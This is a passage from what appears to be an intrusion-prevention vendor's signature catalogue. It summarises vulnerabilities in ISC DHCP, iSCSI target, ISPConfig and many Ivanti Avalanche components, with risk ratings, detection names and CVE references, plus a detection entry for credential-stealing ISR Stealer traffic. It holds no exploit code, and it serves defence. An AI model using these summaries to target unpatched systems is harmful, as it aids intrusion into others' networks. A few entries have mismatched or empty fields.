Resource Starvation

Description:

A denial of service vulnerability has been reported in ISC DHCP Server. This vulnerability is due to improper clean up of closed OMAPI connections. A remote attacker can exploit this vulnerability by initiating many OMAPI connections with a vulnerable server. Successful exploitation results in denial-of-service conditions on the server's OMAPI interface.

Situation:

Analyzer_ISC-DHCP-Server-OMAPI-Denial-Of-Service
Generic_TCP-ISC-DHCP-Server-Omapi-Denial-Of-Service

References:

CVE-2017-3144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3144

Isc-DHCP-Server-Packet-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC DHCP Server

Risk:

High

First detected in:

sgpkg-ips-408-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP Server

Type:

Malfunction

Description:

A denial of service vulnerability exists in ISC DHCP Server. The vulnerability is caused by the processing of incomplete BOOTP packets. The processing of these malformed packets can lead to a denial of service condition. An unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted packet to a vulnerable system. This can result in the termination of the affected service causing a denial of service condition.

Situation:

BOOTP_CS-Isc-DHCP-Server-Packet-Processing-Denial-Of-Service

References:

CVE-2011-2748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2748

BID-49120
http://www.securityfocus.com/bid/49120

Isc-DHCP-Server-Zero-Length-Client-Id-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC DHCP Server

Risk:

Moderate

First detected in:

sgpkg-ips-318-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP Server

Type:

Malfunction

Description:

A denial of server vulnerability has been reported in ISC DHCP server. The vulnerability is due to a design error while parsing request containing a zero length client identifier. Remote unauthenticated attackers could exploit this vulnerability by sending crafted packets to the target DHCP server. Successful exploitation of this vulnerability would terminate the DHCP server process and result in a denial of service condition.

Situation:

BOOTP_CS-Isc-DHCP-Server-Zero-Length-Client-Id-Denial-Of-Service

References:

CVE-2010-2156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2156

BID-40775
http://www.securityfocus.com/bid/40775

iSCSI-target-Multiple-Implementations-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in iSCSI target

Risk:

High

First detected in:

sgpkg-ips-321-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

iSCSI target

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in iSCSI target. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted SCN request to execute arbitrary code with the privileges of the root user.

Situation:

Generic_CS-iSCSI-target-Multiple-Implementations-Buffer-Overflow

References:

CVE-2010-2221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2221

BID-41327
http://www.securityfocus.com/bid/41327

OSVDB-65992
http://www.osvdb.org/65992

OSVDB-65991
http://www.osvdb.org/65991

OSVDB-65990
http://www.osvdb.org/65990

iSCSI-target-Multiple-Implementations-Format-String-Code-Execution

About this vulnerability:

A vulnerability in iSCSI target

Risk:

High

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

iSCSI target

Type:

Format String

Description:

A format string vulnerability exist in multiple implementations of iSCSI target.

Situation:

Generic_CS-iSCSI-target-Multiple-Implementations-Format-String-Code-Execution

References:

CVE-2010-0743
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0743

BID-39127
http://www.securityfocus.com/bid/39127

Iseemedia-LPViewer-ActiveX-Control-Multiple-Buffer-Overflows

About this vulnerability:

Multiple buffer overflow vulnerabilities in iseemedia LPViewer

Risk:

High

First detected in:

sgpkg-ips-175-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

iseemedia LPViewer

Type:

Buffer Overflow

Description:

There are multiple buffer overflow vulnerabilities in the iseemedia LPViewer ActiveX Control. The vulnerabilities are due to insufficient boundary checking when a crafted parameter is passed to the affected ActiveX control. An attacker can exploit this vulnerability by enticing a target user to open a malicious web page. Successful exploitation can lead to injection and execution of arbitrary code in the security context of the currently logged in user.

Situation:

HTTP_SS-Iseemedia-LPViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow
File-Text_Iseemedia-LPViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow

References:

CVE-2008-4384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4384

BID-31604
http://www.securityfocus.com/bid/31604

ISO-MPEG-4-Media-Content

About this vulnerability:	Download of ISO MPEG-4 media file
Risk:	Low
First detected in:	sgpkg-ips-173-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Any Software
Type:	Insecure Configuration
Description:	ISO MPEG-4 is a common media file format that carries video and audio content.
Situation:	HTTP_SS-ISO-MPEG-4-Download File-MPEG_ISO-MPEG-4-Download

ISPConfig-Remote-Command-Execution

About this vulnerability:

ISPConfig Remote Command Execution

Risk:

Moderate

First detected in:

sgpkg-ips-572-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISPConfig

Type:

PHP Injection

Description:

There is a remote command execution vulnerability in ISPConfig hosting control panel. An authenticated user can exploit this by executing arbitrary PHP code within the target system.

Situation:

HTTP_CS-ISPConfig-Remote-Command-Execution

References:

CVE-2013-3629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3629

ISPConfig-User_settings.php-Arbitrary-File-Inclusion

About this vulnerability:

A vulnerability in ISPConfig

Risk:

Moderate

First detected in:

sgpkg-ips-1110-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISPConfig

Type:

Input Validation

Description:

There has been reported an arbitrary file inclusion vulnerability in ISPConfig. A remote attacker can exploit this vulnerability by sending a crafted request to the target service. Successful exploitation can result in arbitrary code execution.

Situation:

HTTP_CRL-ISPConfig-User_settings.php-Arbitrary-File-Inclusion

References:

CVE-2018-17984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17984

ISR-Stealer-C2-Traffic

About this vulnerability:	ISR Stealer traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1054-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	ISR Stealer is a modified version of the ancient Hackhound infostealer. This stealer is used to steal different kind of credentials from the target system.
Situation:	HTTP_CSH-ISR-Stealer-C2-Traffic

ISS-PAM-ICQ-Parsing-BOF

About this vulnerability:

Buffer overflow in ICQ protocol parsing module in the Internet Security Systems

Risk:

High

First detected in:

sgpkg-ips-44-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISS BlackICE, Proventia A/G/M, RealSecure

Type:

Buffer Overflow

Description:

Internet Security Systems (ISS) Protocol Analysis Module (PAM) contains a remote buffer overflow vulnerability when parsing the ICQ protocol. This issue exists due to insufficient bounds checking when parsing certain protocol fields embedded within ICQ response data. Successful exploitation of this issue may allow a remote attacker to execute arbitrary code on a vulnerable system.

Situation:

Generic_ISS-PAM-ICQ-BOF
Generic_ISS-PAM-ICQ-Parsing-BOF-1
Generic_ISS-PAM-ICQ-Parsing-BOF-2
Generic_ISS-PAM-ICQ-Parsing-BOF-Witty
Generic_ISS-PAM-ICQ-Parsing-BOF-3
Generic_ISS-PAM-ICQ-Parser-BOF
Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-1
Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-2
Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-3

References:

CVE-2004-0362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0362

BID-9913
http://www.securityfocus.com/bid/9913

OSVDB-4355
http://www.osvdb.org/4355

ISTBar-Internet-Explorer-Toolbar

About this vulnerability:	ISTBar Internet Explorer Toolbar
Risk:	Low
First detected in:	sgpkg-ips-35-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ISTBar Internet Explorer Toolbar
Type:	Misconfiguration
Description:	ISTBar is an Internet Explorer toolbar that may be considered unwanted software by many organizations. It may disclose browsing information and show advertisement popus.
Situation:	HTTP_CSH-ISTBar-Activity HTTP_CSH-ISTBar-Install HTTP_CSH-ISTBar-Popup-Instructions-Download

ITHouse-Mail-Server-RCPT-To-BOF

About this vulnerability:

ITHouse Mail Server RCPT To Buffer Overflow system compromise

Risk:

High

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 95; Windows NT

Software:

ITHouse mail server

Type:

Buffer Overflow

Description:

Buffer overflow in ITHouse mail server RCPT To argument processing allows remote attacker to execute arbitraty commands in the server.

Situation:

HTTP_CRL-ITS-SCADA-SQL-Injection

References:

CVE-2000-0488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0488

BID-1285
http://www.securityfocus.com/bid/1285

itok-Token-SQL-Injection

About this vulnerability:	An itok Token SQL Injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-1027-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Input Validation
Description:	A vulnerability in the itok Token parameter which allows remote attackers to gain sensitive information via an SQL injection.
Situation:	HTTP_CRL-itok-Token-SQL-Injection

ITS-SCADA-SQL-Injection

About this vulnerability:

A vulnerability in ITS SCADA

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ITS SCADA

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in ITS SCADA which may allow an unauthorized information disclosure.

Situation:

References:

OSVDB-69872
http://www.osvdb.org/69872

Ivanti-Avalanche-Certificate-Management-Server-Insecure-Deserialization

About this vulnerability:	A vulnerability in Ivanti Avalanche
Risk:	High
First detected in:	sgpkg-ips-1504-5242
Last changed:	sgpkg-ips-1504-5242
Platform:	Generic
Software:	Ivanti Avalanche
Type:	Input Validation
Description:	An insecure deserialization vulnerability has been reported in the Ivanti Avalanche Certificate Management Server. The vulnerability is due to insufficient validation of serialized data sent to the Certificate Management Server. A remote attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in remote code execution in the context of SYSTEM.
Situation:	Generic_TCP-Ivanti-Avalanche-Certificate-Management-Server-Insecure-Deserialization

Ivanti-Avalanche-Copyfile-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1742-5242

Last changed:

sgpkg-ips-1742-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of user data within the copyFile method. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.

Situation:

HTTP_CRL-Ivanti-Avalanche-Copyfile-Directory-Traversal

References:

CVE-2024-23535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23535

Ivanti-Avalanche-Datarepository-Service-Insecure-Deserialization

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1440-5242

Last changed:

sgpkg-ips-1440-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Insufficient validation of serialized data sent to the DataRepository service causes an insecure deserialization vulnerability in Ivanti Avalance. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Ivanti-Avalanche-Datarepository-Service-Insecure-Deserialization

References:

CVE-2021-42130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42130

Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1426-5242

Last changed:

sgpkg-ips-1426-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

An arbitrary file upload vulnerability exists in Ivanti Avalanche Enterprise Service. This vulnerability is due to insufficient validation of file path for file uploading in the Central FileStore. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary file upload in the security context of SYSTEM and lead to possible remote code execution.

Situation:

HTTP_CRL-Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Arbitrary-File-Upload

References:

CVE-2021-42125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42125

Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Mapshare-Command-Injection

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1425-5242

Last changed:

sgpkg-ips-1425-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Insufficient validation of the Central FileStore configuration fields causes a command injection vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Ivanti-Avalanche-Enterprise-Service-Central-Filestore-Mapshare-Command-Injection

References:

CVE-2021-42129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42129

Ivanti-Avalanche-Enterpriseserver-Getprofileapplicationdata-SQL-Injection

About this vulnerability:	A vulnerability in Ivanti Avalanche
Risk:	Moderate
First detected in:	sgpkg-ips-1477-5242
Last changed:	sgpkg-ips-1477-5242
Platform:	Generic
Software:	Ivanti Avalanche
Type:	Input Validation
Description:	Insufficient validation of data sent to the EnterpriseServer service causes an SQL injection vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation:	Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Getprofileapplicationdata-SQL-Injection

Ivanti-Avalanche-Enterpriseserver-Getprofiledata-SQL-Injection

About this vulnerability:	A vulnerability in Ivanti Avalanche
Risk:	Moderate
First detected in:	sgpkg-ips-1484-5242
Last changed:	sgpkg-ips-1484-5242
Platform:	Generic
Software:	Ivanti Avalanche
Type:	Input Validation
Description:	Insufficient validation of data sent to the EnterpriseServer service causes an SQL injection vulnerability in Ivanti Avalance. A succesful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation:	Generic_CS-Ivanti-Avalanche-Enterpriseserver-Getprofiledata-SQL-Injection

Ivanti-Avalanche-Enterpriseserver-Getsettings-Authentication-Bypass

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1592-5242

Last changed:

sgpkg-ips-1592-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Malfunction

Description:

An authentication bypass has been reported in Ivanti Avalanche Enterprise Server. The vulnerability is due to exposure of a dangerous method. A remote attacker could exploit the vulnerability by sending crafted requests to a target server. Successful exploitation would allow an attacker to obtain system configuration information, including passwords that could be used to bypass authentication in other Avalanche services.

Situation:

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Getsettings-Authentication-Bypass

References:

CVE-2023-28126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28126

Ivanti-Avalanche-Enterpriseserver-Service-getDisplayableTreeData-SQL-Injection

About this vulnerability:	A vulnerability in the Ivanti Avalanche EnterpriseServer service.
Risk:	High
First detected in:	sgpkg-ips-1484-5242
Last changed:	sgpkg-ips-1484-5242
Platform:	Generic
Software:	Ivanti Avalanche
Type:	SQL Injection
Description:	A vulnerability in the Ivanti Avalanche EnterpriseServer service, versions prior to 6.3.4, which allows remote attackers to execute arbitrary SQL commands, due to the insufficient validation of data sent to the EnterpriseServer service.
Situation:	Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-getDisplayableTreeData-SQL-Injection

Ivanti-Avalanche-Enterpriseserver-Service-Save-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1438-5242

Last changed:

sgpkg-ips-1438-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Insufficient validation of data sent to the EnterpriseServer service causes an SQL injection vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Save-SQL-Injection

References:

CVE-2021-42131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42131

Ivanti-Avalanche-Enterpriseserver-Service-Setuser-Authentication-Bypass

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1433-5242

Last changed:

sgpkg-ips-1433-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Malfunction

Description:

Lack of proper authentication in certain operations in Ivanti Avalanche Enterprise Server allows an attacker to bypass access controls.

Situation:

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Setuser-Authentication-Bypass

References:

CVE-2021-42128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42128

Ivanti-Avalanche-Enterpriseserver-Setsettings-Authentication-Bypass

About this vulnerability:	A vulnerability in Ivanti Avalanche
Risk:	Moderate
First detected in:	sgpkg-ips-1482-5242
Last changed:	sgpkg-ips-1482-5242
Platform:	Generic
Software:	Ivanti Avalanche
Type:	Malfunction
Description:	A authentication bypass vulnerability has been reported in the Ivanti Avalanche Enterprise Server. The vulnerability is due to lack of authentication and input validation for certain functionality. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in access control policy bypass.
Situation:	Generic_CS-Ivanti-Avalanche-Enterpriseserver-Setsettings-Authentication-Bypass

Ivanti-Avalanche-Extractzipentry-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of file names in the method extractZipEntry. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.

Situation:

File-Zip_Ivanti-Avalanche-Extractzipentry-Directory-Traversal

References:

CVE-2024-24994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24994

Ivanti-Avalanche-Filestoreconfig-CVE-2023-32564-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1626-5242

Last changed:

sgpkg-ips-1702-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

An arbitrary file upload vulnerability has been reported for Ivanti Avalanche. This vulnerability is due to improper input validation in the FileStoreConfig app. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploring this vulnerability could result in remote code execution as SYSTEM.

Situation:

HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2023-32564-Arbitrary-File-Upload

References:

CVE-2023-32564
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32564

Ivanti-Avalanche-Filestoreconfig-CVE-2023-46263-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1677-5242

Last changed:

sgpkg-ips-1677-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2023-46263-Arbitrary-File-Upload

References:

CVE-2023-46263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46263

Ivanti-Avalanche-Filestoreconfig-CVE-2024-29848-Arbitrary-File-Upload

About this vulnerability:

An attempt to exploit a vulnerability in Ivanti Avalanche detected

Risk:

High

First detected in:

sgpkg-ips-1746-5242

Last changed:

sgpkg-ips-1746-5242

Platform:

Windows

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

A vulnerability in Ivanti Avalanche, versions prior to 6.4.3.602, which allows remote attackers to upload arbitrary files and execute code, due to improper input validation in the FileStoreConfig app.

Situation:

HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-CVE-2024-29848-Arbitrary-File-Upload

References:

CVE-2024-29848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29848

Ivanti-Avalanche-Filestoreconfig-Validatefilestoreuncpath-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1627-5242

Last changed:

sgpkg-ips-1627-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ivanti-Avalanche-Filestoreconfig-Validatefilestoreuncpath-Arbitrary-File-Upload

References:

CVE-2023-28128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28128

Ivanti-Avalanche-Getadhocfilepath-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1729-5242

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of user data within the getAdhocFilePath method. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.

Situation:

HTTP_CRL-Ivanti-Avalanche-Getadhocfilepath-Directory-Traversal

References:

CVE-2024-24992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24992

Ivanti-Avalanche-Imagefilepath-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1473-5242

Last changed:

sgpkg-ips-1473-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Directory Traversal

Description:

Improper input sanitization causes a directory traversal vulnerability in the imageFilePath parameter of Ivanti Avalanche. A successful exploit allows an attacker to access arbitrary files on the target system.

Situation:

HTTP_CSU-Ivanti-Avalanche-Imagefilepath-Directory-Traversal

References:

CVE-2021-30497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30497

Ivanti-Avalanche-Jwttokenutility-Insecure-Deserialization

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1508-5242

Last changed:

sgpkg-ips-1508-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in the Ivanti Avalanche JwtTokenUtility. The vulnerability is due to insufficient validation of serialized data processed by the JwtTokenUtility. A remote attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in remote code execution in the context of SYSTEM.

Situation:

Generic_TCP-Ivanti-Avalanche-Jwttokenutility-Insecure-Deserialization

References:

CVE-2022-36971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36971

Ivanti-Avalanche-Notification-Server-Insecure-Deserialization

About this vulnerability:	A vulnerability in Ivanti Avalanche
Risk:	High
First detected in:	sgpkg-ips-1520-5242
Last changed:	sgpkg-ips-1520-5242
Platform:	Generic
Software:	Ivanti Avalanche
Type:	Input Validation
Description:	An insecure deserialization vulnerability has been reported in the Ivanti Avalanche Notification Server. The vulnerability is due to insufficient validation of serialized data sent to the Notification Server. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in remote code execution in the context of SYSTEM.
Situation:	Generic_CS-Ivanti-Avalanche-Notification-Server-Insecure-Deserialization

Ivanti-Avalanche-Path-Traversal-CVE-2023-41474

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1686-5242

Last changed:

sgpkg-ips-1686-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Directory Traversal

Description:

A path traversal vulnerability has been reported in Ivanti Avalanche. A remote, authenticated attacker can use this vulnerability to read arbitrary files in the AvalancheWeb directory.

Situation:

HTTP_CRL-Ivanti-Avalanche-Path-Traversal-CVE-2023-41474

References:

CVE-2023-41474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41474

Ivanti-Avalanche-Printerdeviceserver-Service-Command-Injection

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1429-5242

Last changed:

sgpkg-ips-1429-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Insufficient input validation in the runAgentRestarter method causes a command injection vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary code on the target with system privileges.

Situation:

Generic_CS-Ivanti-Avalanche-Printerdeviceserver-Service-Command-Injection

References:

CVE-2021-42132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42132

Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1772-5242

Last changed:

sgpkg-ips-1792-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported for Ivanti Avalanche Remote Control Server. This vulnerability is due to a directory traversal in the Skins.deleteSkin() method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file deletion or, in the worst case, denial of service.

Situation:

HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal
ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal

References:

CVE-2024-38652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38652

Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1573-5242

Last changed:

sgpkg-ips-1646-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Malfunction

Description:

An authentication bypass has been reported in Ivanti Avalanche Remote Control Server. The vulnerability is due to improper validation of configuration property parameters. A remote, unauthenticated attacker could exploit the vulnerability by sending crafted requests to a target server. Successful exploitation would allow an unauthenticated user to login as an authenticated user.

Situation:

HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass
ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass

References:

CVE-2022-44574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44574

Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1646-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported for Ivanti Avalanche Remote Control Server. This vulnerability is due to improper input validation in the updateSkin function. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of SYSTEM.

Situation:

HTTP_CS-Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal
ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal

References:

CVE-2023-32563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32563

Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1676-5242

Last changed:

sgpkg-ips-1676-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

A server-side request forgery vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to insufficient validation of user input sent to the Remote Control Server used to build a request string. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious request to the target server. Successfully exploiting this vulnerability could result in information disclosure or spoofing conditions.

Situation:

HTTP_CRL-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery
ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery
ARCserve_CS-Potential-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery

References:

CVE-2023-46262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46262

Ivanti-Avalanche-Resourcefilter-Dofilter-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1808-5242

Last changed:

sgpkg-ips-1808-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

A directory traversal vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of the request URI. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure.

Situation:

HTTP_CSU-Ivanti-Avalanche-Resourcefilter-Dofilter-Directory-Traversal

References:

CVE-2024-47011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47011

Ivanti-Avalanche-Securefilter-Allowpassthrough-Authentication-Bypass

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1697-5242

Last changed:

sgpkg-ips-1697-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

An authentication bypass vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of the request URI. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure.

Situation:

HTTP_CRL-Ivanti-Avalanche-Securefilter-Allowpassthrough-Authentication-Bypass

References:

CVE-2021-22962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22962

Ivanti-Avalanche-Securefilter-Dofilter-CVE-2024-47009-Authentication-Bypass

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1844-5242

Last changed:

